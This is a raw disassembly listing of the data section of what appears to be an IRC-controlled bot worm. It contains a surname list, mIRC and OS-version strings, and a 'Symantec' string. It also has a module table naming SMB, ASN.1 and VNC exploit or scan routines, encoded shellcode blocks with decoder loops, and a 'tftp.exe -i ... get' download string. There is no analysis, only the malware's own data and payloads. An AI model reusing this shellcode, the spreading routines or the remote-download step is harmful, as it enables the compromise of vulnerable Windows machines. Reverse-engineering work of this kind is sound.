aPugh db 'Pugh',0 ; DATA XREF: .data:0044613C�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: .data:00446140�o
aQuaday db 'Quaday',0 ; DATA XREF: .data:00446144�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: .data:00446148�o
align 4
aRabe db 'Rabe',0 ; DATA XREF: .data:0044614C�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: .data:00446150�o
align 4
aRadeke db 'Radeke',0 ; DATA XREF: .data:00446154�o
align 4
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: .data:00446158�o
aRaney db 'Raney',0 ; DATA XREF: .data:0044615C�o
align 4
aRangan db 'Rangan',0 ; DATA XREF: .data:00446160�o
align 10h
aRankin db 'Rankin',0 ; DATA XREF: .data:00446164�o
align 4
aRapple db 'Rapple',0 ; DATA XREF: .data:00446168�o
align 10h
aRayport db 'Rayport',0 ; DATA XREF: .data:0044616C�o
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: .data:00446170�o
align 4
aReedquist db 'Reedquist',0 ; DATA XREF: .data:00446174�o
align 4
aCunningham db 'Cunningham',0 ; DATA XREF: .data:00446178�o
align 10h
aReinold db 'Reinold',0 ; DATA XREF: .data:0044617C�o
aRemak db 'Remak',0 ; DATA XREF: .data:00446180�o
align 10h
aRenick db 'Renick',0 ; DATA XREF: .data:00446184�o
align 4
aRepetto db 'Repetto',0 ; DATA XREF: .data:00446188�o
aResnik db 'Resnik',0 ; DATA XREF: .data:0044618C�o
align 4
aRhea db 'Rhea',0 ; DATA XREF: .data:00446190�o
align 10h
aRichmond db 'Richmond',0 ; DATA XREF: .data:00446194�o
align 4
aRielly db 'Rielly',0 ; DATA XREF: .data:00446198�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: .data:0044619C�o
align 4
aRineer db 'Rineer',0 ; DATA XREF: .data:004461A0�o
align 4
aRish db 'Rish',0 ; DATA XREF: .data:004461A4�o
align 4
aRivera db 'Rivera',0 ; DATA XREF: .data:004461A8�o
align 4
aRobinson db 'Robinson',0 ; DATA XREF: .data:004461AC�o
align 10h
aRocha db 'Rocha',0 ; DATA XREF: .data:004461B0�o
align 4
aRoesler db 'Roesler',0 ; DATA XREF: .data:004461B4�o
aRogers db 'Rogers',0 ; DATA XREF: .data:004461B8�o
align 4
aRonen db 'Ronen',0 ; DATA XREF: .data:004461BC�o
align 10h
aRow db 'Row',0 ; DATA XREF: .data:004461C0�o
aRoyal db 'Royal',0 ; DATA XREF: .data:004461C4�o
align 4
aRu db 'Ru',0 ; DATA XREF: .data:004461C8�o
align 10h
aRuan db 'Ruan',0 ; DATA XREF: .data:004461CC�o
align 4
aRuderman db 'Ruderman',0 ; DATA XREF: .data:004461D0�o
align 4
aRuescher db 'Ruescher',0 ; DATA XREF: .data:004461D4�o
align 10h
aRush db 'Rush',0 ; DATA XREF: .data:004461D8�o
align 4
aRyu db 'Ryu',0 ; DATA XREF: .data:004461DC�o
aSabatello db 'Sabatello',0 ; DATA XREF: .data:004461E0�o
align 4
aSadler db 'Sadler',0 ; DATA XREF: .data:004461E4�o
align 10h
aSafire db 'Safire',0 ; DATA XREF: .data:004461E8�o
align 4
aSahu db 'Sahu',0 ; DATA XREF: .data:004461EC�o
align 10h
aSali db 'Sali',0 ; DATA XREF: .data:004461F0�o
align 4
aSamson db 'Samson',0 ; DATA XREF: .data:004461F4�o
align 10h
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: .data:004461F8�o
aSanna db 'Sanna',0 ; DATA XREF: .data:004461FC�o
align 4
aSapers db 'Sapers',0 ; DATA XREF: .data:00446200�o
align 10h
aSarin db 'Sarin',0 ; DATA XREF: .data:00446204�o
align 4
aSartore db 'Sartore',0 ; DATA XREF: .data:00446208�o
aSase db 'Sase',0 ; DATA XREF: .data:0044620C�o
align 4
aSatin db 'Satin',0 ; DATA XREF: .data:00446210�o
align 10h
aSatta db 'Satta',0 ; DATA XREF: .data:00446214�o
align 4
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: .data:00446218�o
align 4
aSawtell db 'Sawtell',0 ; DATA XREF: .data:0044621C�o
aSayied db 'Sayied',0 ; DATA XREF: .data:00446220�o
align 4
aScarponi db 'Scarponi',0 ; DATA XREF: .data:00446224�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: .data:00446228�o
align 4
aScharf db 'Scharf',0 ; DATA XREF: .data:0044622C�o
align 4
aScharlemann db 'Scharlemann',0 ; DATA XREF: .data:00446230�o
aScheiner db 'Scheiner',0 ; DATA XREF: .data:00446234�o
align 4
aSchiano db 'Schiano',0 ; DATA XREF: .data:00446238�o
aSchifini db 'Schifini',0 ; DATA XREF: .data:0044623C�o
align 10h
aSchilling db 'Schilling',0 ; DATA XREF: .data:00446240�o
align 4
aSchmitt db 'Schmitt',0 ; DATA XREF: .data:00446244�o
aSchossberger db 'Schossberger',0 ; DATA XREF: .data:00446248�o
align 4
aSchuman db 'Schuman',0 ; DATA XREF: .data:0044624C�o
aSchutte db 'Schutte',0 ; DATA XREF: .data:00446250�o
aSchuyler db 'Schuyler',0 ; DATA XREF: .data:00446254�o
align 10h
aSchwan db 'Schwan',0 ; DATA XREF: .data:00446258�o
align 4
aSchwickrath db 'Schwickrath',0 ; DATA XREF: .data:0044625C�o
aScovel db 'Scovel',0 ; DATA XREF: .data:00446260�o
align 4
aScudder db 'Scudder',0 ; DATA XREF: .data:00446264�o
aSeaton db 'Seaton',0 ; DATA XREF: .data:00446268�o
align 4
aSeeber db 'Seeber',0 ; DATA XREF: .data:0044626C�o
align 4
aSegal db 'Segal',0 ; DATA XREF: .data:00446270�o
align 4
aSekler db 'Sekler',0 ; DATA XREF: .data:00446274�o
align 4
aSelvage db 'Selvage',0 ; DATA XREF: .data:00446278�o
aSen db 'Sen',0 ; DATA XREF: .data:0044627C�o
aSennett db 'Sennett',0 ; DATA XREF: .data:00446280�o
aSeterdahl db 'Seterdahl',0 ; DATA XREF: .data:00446284�o
align 4
aSexton db 'Sexton',0 ; DATA XREF: .data:00446288�o
align 4
aSeyfert db 'Seyfert',0 ; DATA XREF: .data:0044628C�o
aShaikh db 'Shaikh',0 ; DATA XREF: .data:00446290�o
align 4
aShakis db 'Shakis',0 ; DATA XREF: .data:00446294�o
align 4
aShankland db 'Shankland',0 ; DATA XREF: .data:00446298�o
align 10h
aShanley db 'Shanley',0 ; DATA XREF: .data:0044629C�o
aShar db 'Shar',0 ; DATA XREF: .data:004462A0�o
align 10h
aShatrov db 'Shatrov',0 ; DATA XREF: .data:004462A4�o
aShavelson db 'Shavelson',0 ; DATA XREF: .data:004462A8�o
align 4
aShea db 'Shea',0 ; DATA XREF: .data:004462AC�o
align 4
aSheats db 'Sheats',0 ; DATA XREF: .data:004462B0�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: .data:004462B4�o
align 10h
aSheppard db 'Sheppard',0 ; DATA XREF: .data:004462B8�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: .data:004462BC�o
align 4
aShesko db 'Shesko',0 ; DATA XREF: .data:004462C0�o
align 10h
aShia db 'Shia',0 ; DATA XREF: .data:004462C4�o
align 4
aShibata db 'Shibata',0 ; DATA XREF: .data:004462C8�o
aShimon db 'Shimon',0 ; DATA XREF: .data:004462CC�o
align 4
aSiesto db 'Siesto',0 ; DATA XREF: .data:004462D0�o
align 10h
aSigalot db 'Sigalot',0 ; DATA XREF: .data:004462D4�o
aSigini db 'Sigini',0 ; DATA XREF: .data:004462D8�o
align 10h
aSigna db 'Signa',0 ; DATA XREF: .data:004462DC�o
align 4
aSilverman db 'Silverman',0 ; DATA XREF: .data:004462E0�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: .data:004462E4�o
align 10h
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: .data:004462E8�o
align 4
aSirilli db 'Sirilli',0 ; DATA XREF: .data:004462EC�o
aSites db 'Sites',0 ; DATA XREF: .data:004462F0�o
align 4
aSkane db 'Skane',0 ; DATA XREF: .data:004462F4�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: .data:004462F8�o
align 4
aSkoda db 'Skoda',0 ; DATA XREF: .data:004462FC�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: .data:00446300�o
align 4
aSlowe db 'Slowe',0 ; DATA XREF: .data:00446304�o
align 4
aSmilow db 'Smilow',0 ; DATA XREF: .data:00446308�o
align 4
aSniffen db 'Sniffen',0 ; DATA XREF: .data:0044630C�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: .data:00446310�o
align 10h
aSocolow db 'Socolow',0 ; DATA XREF: .data:00446314�o
aSolon db 'Solon',0 ; DATA XREF: .data:00446318�o
align 10h
aSomers db 'Somers',0 ; DATA XREF: .data:0044631C�o
align 4
aSommariva db 'Sommariva',0 ; DATA XREF: .data:00446320�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: .data:00446324�o
align 10h
aSorg db 'Sorg',0 ; DATA XREF: .data:00446328�o
align 4
aSottak db 'Sottak',0 ; DATA XREF: .data:0044632C�o
align 10h
aSoukup db 'Soukup',0 ; DATA XREF: .data:00446330�o
align 4
aSoule db 'Soule',0 ; DATA XREF: .data:00446334�o
align 10h
aSoultanian db 'Soultanian',0 ; DATA XREF: .data:00446338�o
align 4
aSpanier db 'Spanier',0 ; DATA XREF: .data:0044633C�o
aSparrow db 'Sparrow',0 ; DATA XREF: .data:00446340�o
aSpaulding db 'Spaulding',0 ; DATA XREF: .data:00446344�o
align 4
aSpeizer db 'Speizer',0 ; DATA XREF: .data:00446348�o
aSpence db 'Spence',0 ; DATA XREF: .data:0044634C�o
align 4
aSperber db 'Sperber',0 ; DATA XREF: .data:00446350�o
aSpicer db 'Spicer',0 ; DATA XREF: .data:00446354�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: .data:00446358�o
align 4
aSpiliotis db 'Spiliotis',0 ; DATA XREF: .data:0044635C�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: .data:00446360�o
aStmartin db 'StMartin',0 ; DATA XREF: .data:00446364�o
align 4
aStalvey db 'Stalvey',0 ; DATA XREF: .data:00446368�o
aStam db 'Stam',0 ; DATA XREF: .data:0044636C�o
align 4
aStang db 'Stang',0 ; DATA XREF: .data:00446370�o
align 10h
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: .data:00446374�o
align 10h
aStates db 'States',0 ; DATA XREF: .data:00446378�o
align 4
aStatlender db 'Statlender',0 ; DATA XREF: .data:0044637C�o
align 4
aStefani db 'Stefani',0 ; DATA XREF: .data:00446380�o
aSteiner db 'Steiner',0 ; DATA XREF: .data:00446384�o
aStephanian db 'Stephanian',0 ; DATA XREF: .data:00446388�o
align 10h
aStepniewska db 'Stepniewska',0 ; DATA XREF: .data:0044638C�o
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: .data:00446390�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: .data:00446394�o
align 4
aStillwell db 'Stillwell',0 ; DATA XREF: .data:00446398�o
align 4
aStock db 'Stock',0 ; DATA XREF: .data:0044639C�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: .data:004463A0�o
align 4
aStockwell db 'Stockwell',0 ; DATA XREF: .data:004463A4�o
align 4
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: .data:004463A8�o
aStonich db 'Stonich',0 ; DATA XREF: .data:004463AC�o
aStorer db 'Storer',0 ; DATA XREF: .data:004463B0�o
align 10h
aStott db 'Stott',0 ; DATA XREF: .data:004463B4�o
align 4
aStrange db 'Strange',0 ; DATA XREF: .data:004463B8�o
aStrauch db 'Strauch',0 ; DATA XREF: .data:004463BC�o
aStreiff db 'Streiff',0 ; DATA XREF: .data:004463C0�o
aStringer db 'Stringer',0 ; DATA XREF: .data:004463C4�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: .data:004463C8�o
align 4
aSumner db 'Sumner',0 ; DATA XREF: .data:004463CC�o
align 10h
aSuo db 'Suo',0 ; DATA XREF: .data:004463D0�o
aSurdam db 'Surdam',0 ; DATA XREF: .data:004463D4�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: .data:004463D8�o
align 4
aSweetser db 'Sweetser',0 ; DATA XREF: .data:004463DC�o
align 4
aSwindle db 'Swindle',0 ; DATA XREF: .data:004463E0�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: .data:004463E4�o
aTai db 'Tai',0 ; DATA XREF: .data:004463E8�o
aTalaugon db 'Talaugon',0 ; DATA XREF: .data:004463EC�o
align 4
aTambiah db 'Tambiah',0 ; DATA XREF: .data:004463F0�o
aTandler db 'Tandler',0 ; DATA XREF: .data:004463F4�o
aTanowitz db 'Tanowitz',0 ; DATA XREF: .data:004463F8�o
align 10h
aTatar db 'Tatar',0 ; DATA XREF: .data:004463FC�o
align 4
aTaveras db 'Taveras',0 ; DATA XREF: .data:00446400�o
aTawn db 'Tawn',0 ; DATA XREF: .data:00446404�o
align 4
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: .data:00446408�o
align 4
aTeague db 'Teague',0 ; DATA XREF: .data:0044640C�o
align 4
aTemes db 'Temes',0 ; DATA XREF: .data:00446410�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: .data:00446414�o
align 4
aTenney db 'Tenney',0 ; DATA XREF: .data:00446418�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: .data:0044641C�o
align 10h
aThan db 'Than',0 ; DATA XREF: .data:00446420�o
align 4
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: .data:00446424�o
align 4
aTheodos db 'Theodos',0 ; DATA XREF: .data:00446428�o
aThibault db 'Thibault',0 ; DATA XREF: .data:0044642C�o
align 4
aThisted db 'Thisted',0 ; DATA XREF: .data:00446430�o
aThomsen db 'Thomsen',0 ; DATA XREF: .data:00446434�o
aThroop db 'Throop',0 ; DATA XREF: .data:00446438�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: .data:0044643C�o
aTill db 'Till',0 ; DATA XREF: .data:00446440�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: .data:00446444�o
aTofallis db 'Tofallis',0 ; DATA XREF: .data:00446448�o
align 4
aTollestrup db 'Tollestrup',0 ; DATA XREF: .data:0044644C�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: .data:00446450�o
align 4
aTolman db 'Tolman',0 ; DATA XREF: .data:00446454�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: .data:00446458�o
aToomer db 'Toomer',0 ; DATA XREF: .data:0044645C�o
align 4
aTopulos db 'Topulos',0 ; DATA XREF: .data:00446460�o
aTorresi db 'Torresi',0 ; DATA XREF: .data:00446464�o
aTorske db 'Torske',0 ; DATA XREF: .data:00446468�o
align 4
aTowler db 'Towler',0 ; DATA XREF: .data:0044646C�o
align 4
aToye db 'Toye',0 ; DATA XREF: .data:00446470�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: .data:00446474�o
align 4
aTrenga db 'Trenga',0 ; DATA XREF: .data:00446478�o
align 10h
aTrewin db 'Trewin',0 ; DATA XREF: .data:0044647C�o
align 4
aTringali db 'Tringali',0 ; DATA XREF: .data:00446480�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: .data:00446484�o
aTroy db 'Troy',0 ; DATA XREF: .data:00446488�o
align 4
aTruss db 'Truss',0 ; DATA XREF: .data:0044648C�o
align 4
aTsiatis db 'Tsiatis',0 ; DATA XREF: .data:00446490�o
aTsomides db 'Tsomides',0 ; DATA XREF: .data:00446494�o
align 10h
aTsukurov db 'Tsukurov',0 ; DATA XREF: .data:00446498�o
align 4
aTuck db 'Tuck',0 ; DATA XREF: .data:0044649C�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: .data:004464A0�o
align 4
aTukan db 'Tukan',0 ; DATA XREF: .data:004464A4�o
align 4
aTurano db 'Turano',0 ; DATA XREF: .data:004464A8�o
align 4
aTurek db 'Turek',0 ; DATA XREF: .data:004464AC�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: .data:004464B0�o
align 4
aTwells db 'Twells',0 ; DATA XREF: .data:004464B4�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: .data:004464B8�o
align 10h
aUllman db 'Ullman',0 ; DATA XREF: .data:004464BC�o
align 4
aUntermeyer db 'Untermeyer',0 ; DATA XREF: .data:004464C0�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: .data:004464C4�o
aUrban db 'Urban',0 ; DATA XREF: .data:004464C8�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: .data:004464CC�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: .data:004464D0�o
align 4
aUzuner db 'Uzuner',0 ; DATA XREF: .data:004464D4�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: .data:004464D8�o
align 4
aWaite db 'Waite',0 ; DATA XREF: .data:004464DC�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: .data:004464E0�o
aValencia db 'Valencia',0 ; DATA XREF: .data:004464E4�o
align 4
aWales db 'Wales',0 ; DATA XREF: .data:004464E8�o
align 10h
aWallenberg db 'Wallenberg',0 ; DATA XREF: .data:004464EC�o
align 4
aWalter db 'Walter',0 ; DATA XREF: .data:004464F0�o
align 4
aVanallen db 'vanAllen',0 ; DATA XREF: .data:004464F4�o
align 10h
aVanzwet db 'VanZwet',0 ; DATA XREF: .data:004464F8�o
aVandenberg db 'Vandenberg',0 ; DATA XREF: .data:004464FC�o
align 4
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: .data:00446500�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: .data:00446504�o
align 10h
aWasowska db 'Wasowska',0 ; DATA XREF: .data:00446508�o
align 4
aVasquez db 'Vasquez',0 ; DATA XREF: .data:0044650C�o
aWaugh db 'Waugh',0 ; DATA XREF: .data:00446510�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: .data:00446514�o
align 4
aWeingarten db 'Weingarten',0 ; DATA XREF: .data:00446518�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: .data:0044651C�o
align 10h
aWeissbourd db 'Weissbourd',0 ; DATA XREF: .data:00446520�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: .data:00446524�o
align 4
aVelasquez db 'Velasquez',0 ; DATA XREF: .data:00446528�o
align 4
aWelles db 'Welles',0 ; DATA XREF: .data:0044652C�o
align 4
aWelsh db 'Welsh',0 ; DATA XREF: .data:00446530�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: .data:00446534�o
aVenne db 'Venne',0 ; DATA XREF: .data:00446538�o
align 4
aVerghese db 'Verghese',0 ; DATA XREF: .data:0044653C�o
align 10h
aWescott db 'Wescott',0 ; DATA XREF: .data:00446540�o
aWetzel db 'Wetzel',0 ; DATA XREF: .data:00446544�o
align 10h
aWhately db 'Whately',0 ; DATA XREF: .data:00446548�o
aWhilton db 'Whilton',0 ; DATA XREF: .data:0044654C�o
aWhite db 'White',0 ; DATA XREF: .data:00446550�o
align 4
aWhitla db 'Whitla',0 ; DATA XREF: .data:00446554�o
align 10h
aWhittaker db 'Whittaker',0 ; DATA XREF: .data:00446558�o
align 4
aViana db 'Viana',0 ; DATA XREF: .data:0044655C�o
align 4
aViano db 'Viano',0 ; DATA XREF: .data:00446560�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: .data:00446564�o
aWiener db 'Wiener',0 ; DATA XREF: .data:00446568�o
align 10h
aViens db 'Viens',0 ; DATA XREF: .data:0044656C�o
align 4
aVignola db 'Vignola',0 ; DATA XREF: .data:00446570�o
aWilder db 'Wilder',0 ; DATA XREF: .data:00446574�o
align 4
aWilhelm db 'Wilhelm',0 ; DATA XREF: .data:00446578�o
aWilk db 'Wilk',0 ; DATA XREF: .data:0044657C�o
align 4
aWilkin db 'Wilkin',0 ; DATA XREF: .data:00446580�o
align 10h
aWilkinson db 'Wilkinson',0 ; DATA XREF: .data:00446584�o
align 4
aVillarreal db 'Villarreal',0 ; DATA XREF: .data:00446588�o
align 4
aWillstatter db 'Willstatter',0 ; DATA XREF: .data:0044658C�o
aWilson db 'Wilson',0 ; DATA XREF: .data:00446590�o
align 4
aVitali db 'Vitali',0 ; DATA XREF: .data:00446594�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: .data:00446598�o
aVoigt db 'Voigt',0 ; DATA XREF: .data:0044659C�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: .data:004465A0�o
align 4
aVonhoffman db 'VonHoffman',0 ; DATA XREF: .data:004465A4�o
align 4
aWoo db 'Woo',0 ; DATA XREF: .data:004465A8�o
aWooden db 'Wooden',0 ; DATA XREF: .data:004465AC�o
align 4
aWoods db 'Woods',0 ; DATA XREF: .data:004465B0�o
align 4
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: .data:004465B4�o
align 4
aVorhaus db 'Vorhaus',0 ; DATA XREF: .data:004465B8�o
aVotey db 'Votey',0 ; DATA XREF: .data:004465BC�o
align 4
aYacono db 'Yacono',0 ; DATA XREF: .data:004465C0�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: .data:004465C4�o
align 4
aYankee db 'Yankee',0 ; DATA XREF: .data:004465C8�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: .data:004465CC�o
aYates db 'Yates',0 ; DATA XREF: .data:004465D0�o
align 4
aYbarra db 'Ybarra',0 ; DATA XREF: .data:004465D4�o
align 4
aYedidia db 'Yedidia',0 ; DATA XREF: .data:004465D8�o
aYesson db 'Yesson',0 ; DATA XREF: .data:004465DC�o
align 4
aYetiv db 'Yetiv',0 ; DATA XREF: .data:004465E0�o
align 4
aYoffe db 'Yoffe',0 ; DATA XREF: .data:004465E4�o
align 4
aYoo db 'Yoo',0 ; DATA XREF: .data:004465E8�o
aYoukSee db 'Youk-See',0 ; DATA XREF: .data:004465EC�o
align 4
aYu db 'Yu',0 ; DATA XREF: .data:004465F0�o
align 10h
aZachary db 'Zachary',0 ; DATA XREF: .data:004465F4�o
aZahedi db 'Zahedi',0 ; DATA XREF: .data:004465F8�o
align 10h
aZangwill db 'Zangwill',0 ; DATA XREF: .data:004465FC�o
align 4
aZegans db 'Zegans',0 ; DATA XREF: .data:00446600�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: .data:00446604�o
aZoldak db 'Zoldak',0 ; DATA XREF: .data:00446608�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: .data:0044660C�o
aZurn db 'Zurn',0 ; DATA XREF: .data:00446610�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: .data:00446614�o
align 4
aZytowski db 'Zytowski',0 ; DATA XREF: .data:00446618�o
align 4
; char aS_38[]
aS_38 db '%s',0 ; DATA XREF: sub_40B0A2+28�o
align 4
; char aSI_3[]
aSI_3 db '%s%i',0 ; DATA XREF: sub_40B0A2+4F�o
align 4
; char aS_39[]
aS_39 db '%s',0 ; DATA XREF: sub_40B10F+19�o
align 4
; char aSI_4[]
aSI_4 db '%s%i',0 ; DATA XREF: sub_40B10F+40�o
align 10h
; char aPc[]
aPc db 'PC',0 ; DATA XREF: sub_40B1BA+6�o
align 4
aPc_0 db 'PC',0 ; DATA XREF: sub_40B1BA+30�o
align 4
aPc_1 db 'PC',0 ; DATA XREF: sub_40B1BA+5C�o
align 4
; char aSI_0[]
aSI_0 db '%s%i',0 ; DATA XREF: sub_40B1BA+87�o
align 4
; char aS_22[]
aS_22 db '%s|',0 ; DATA XREF: sub_40B260+2F�o
; char aSI_1[]
aSI_1 db '%s%i',0 ; DATA XREF: sub_40B260+56�o
align 10h
a95 db '95',0 ; DATA XREF: sub_40B2D5+4F�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40B2D5+5D�o
align 4
a98 db '98',0 ; DATA XREF: sub_40B2D5+6D�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: sub_40B2D5+7D�o
align 10h
a2k db '2K',0 ; DATA XREF: sub_40B2D5+96�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_40B2D5+A6�o
align 4
a2k3 db '2K3',0 ; DATA XREF: sub_40B2D5+B4�o
a??? db '???',0 ; DATA XREF: sub_40B2D5:loc_40B390�o
; char aS_23[]
aS_23 db '[%s]|',0 ; DATA XREF: sub_40B2D5+C4�o
align 4
; char aSI_2[]
aSI_2 db '%s%i',0 ; DATA XREF: sub_40B2D5+EB�o
align 10h
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40B3DF+1F�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_40B3DF+2C�o
; char aDS[]
aDS db '[%d]%s',0 ; DATA XREF: sub_40B3DF+3A�o
align 4
aMirc_1 db 'mIRC',0 ; DATA XREF: sub_40B3DF:loc_40B42E�o
align 4
; char aM_1[]
aM_1 db '[M]',0 ; DATA XREF: sub_40B3DF+5C�o
dword_4490D0 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B687+C4�o
db 66h, 0B9h
word_4490DE dw 0FFFFh ; DATA XREF: sub_40B687+CC�w
db 80h, 73h, 0Eh
byte_4490E3 db 0FFh ; DATA XREF: sub_40B687+D3�w
dd 0F9E243h
dword_4490E8 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B687+A2�o
db 0B1h
byte_4490F5 db 0FFh ; DATA XREF: sub_40B687+AA�w
dw 7380h
db 0Ch
byte_4490F9 db 0FFh ; DATA XREF: sub_40B687+B0�w
dw 0E243h
dd 0F9h
dword_449100 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40B510+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_449164 dd 12h ; DATA XREF: sub_40B510+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40B510+79�o
; sub_40B510+9B�o
aJ_0 db 'j',0
db 0E8h
dword_44917D dd 17h ; DATA XREF: sub_40B510+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_449185 dd 1 ; DATA XREF: sub_40B510+45�w
byte_449189 db 0, 6Ah, 0 ; DATA XREF: sub_40B510+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_449193 dd 0FFFFFFEDh ; DATA XREF: sub_40B510+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
dword_4491C4 dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B84B+10�o
; char aD_S_0[]
aD_S_0 db '%d. %s',0 ; DATA XREF: sub_40B84B+46�o
align 10h
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40BA1C+35�o
align 4
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40BA1C+51�o
align 10h
aSym db 'sym',0 ; DATA XREF: sub_40C989+169�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40BE72+30�o
; sub_41C76A+2CB�o
align 4
dd 5 dup(0)
dword_449248 dd 0B97h ; DATA XREF: sub_401CC7+1D58�r
; sub_401CC7+1D84�o ...
off_44924C dd offset sub_40EB60 ; DATA XREF: sub_40C989+1EA�r
dword_449250 dd 0 ; DATA XREF: sub_40BCE2+2E�o
; sub_40DB44+19E�w ...
dword_449254 dd 1 ; DATA XREF: sub_40C165+1F�r
dword_449258 dd 1 ; DATA XREF: sub_40C165+3B3�r
dword_44925C dd 0 ; DATA XREF: sub_40C165+292�r
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch
dd offset sub_40EC96
dd 0
dd 2 dup(1), 0
aNet139 db 'net139',0
align 4
dd 654E0000h, 69706174h, 393331h, 5 dup(0)
dd 8Bh
dd offset sub_40E9F5
dd 0
dd 2 dup(1), 0
aNet445 db 'net445',0
align 4
dd 654E0000h, 69706174h, 353434h, 5 dup(0)
dd 1BDh
dd offset sub_40E9F5
dd 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 4
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh
dd offset sub_40DB44
dd 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 4
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh
dd offset sub_40DB44
dd 0
dd 2 dup(1), 0
aVncs db 'vncs',0
align 4
dd 54480000h, 562D5054h, 434Eh, 5 dup(0)
dd 170Ch
dd offset sub_41C76A
dd 5 dup(0)
dd 10100h, 0Eh dup(0)
aNet139_0 db 'net139',0
align 4
db 2 dup(0)
byte_44942A db 1 ; DATA XREF: sub_401CC7:loc_40399D�r
; sub_401CC7+1CE0�o
aNet445_0 db 'net445',0
align 4
dd 73610100h, 3534346Eh, 0
dd 636E7601h, 0
dd 1000000h, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
